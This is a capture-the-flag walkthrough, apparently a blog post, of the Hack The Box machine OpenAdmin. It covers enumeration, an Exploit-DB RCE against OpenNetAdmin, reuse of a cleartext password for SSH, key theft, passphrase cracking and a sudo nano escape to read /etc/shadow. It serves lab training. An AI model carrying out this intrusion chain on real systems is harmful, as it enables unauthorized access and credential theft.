Again, we start with nmap -sC -sV -oA ./OpenAdmin 10.10.10.171
SSH and Apache appear to be running on their usual ports. Apache just pulls up the Default Page so lets take a look at what directories there might be. The Gobuster output is in the CTB if you want all of the outputs, but the ones we care about are artwork, music, ona file, and sierra. The most important one being "ona". Navigating to http://10.10.10.171/ona brings up an older version of Open Net Admin. We get ona by clicking the "Login" link on the music page. A quick Google search shows us an RCE path we can use in the Exploit DB.
Running this gets us an ugly shell that we can't import tty or cd out of. A little bit of trial and error and I found some database settings with a nice password clear-text. #stopcodingcleartextpasswords
So we have:
One other good thing is that we can cat the /etc/passwd file to get our usernames. Doing so shows that there are really only two users.
So, let's try to SSH as Jimmy and Joanna with that n1nj4W4rri0R! password.....and Jimmy's the big winner (or loser for re-using passwords but I'll leave that decision up to you). Move LinEnum over to the tmp folder and run it. As always the output of it is inside the CTB file listed above.
Digging through the LinEnum output, we see that Ole' Jimmy has ownership and access to the /var/www/internal folder and there is a main.php file in there that has some interesting information.
For some reason, main.php is calling Joanna's RSA keypair. So, we might be able to CURL her key pair. Trying just to CURL straight from where we are using:
fails AT PORT 80! Let's see what else is listening using:
If we go through each port, we find that 52846 is the winner of that famous chicken dinner and we have Joanna's Private Key. Create a joanna.key file with that key in it and we're off to the next race.
Aaaand Roadblock. I should have paid attention to the last lines. "Don't forget your 'ninja' password" There's a passphrase on the Key. Time for John to come off the bench. Also, this is the first box since I blew my Kali instance away. So, I forgot to gunzip rockyou.txt.... oops.
Now we can ssh -i joanna.key email@example.com with the passphrase 'bloodninjas'. For an easy box to have foothold > pivot > pivot > root is rare. Either cherish it or cuss at it. Your choice. From here though, we can get the user and root flags. Using sudo -l we see that Joanna can only use /bin/nano on the /opt/priv file. Not much help until you think about the fact that nano allows you to read a file from INSIDE another file.
CTRL + R and we can read just about anything. Want the /etc/shadow file? Sure! (You'll need that with the new HTB flag rotation policy). Want the Root Flag? DONE.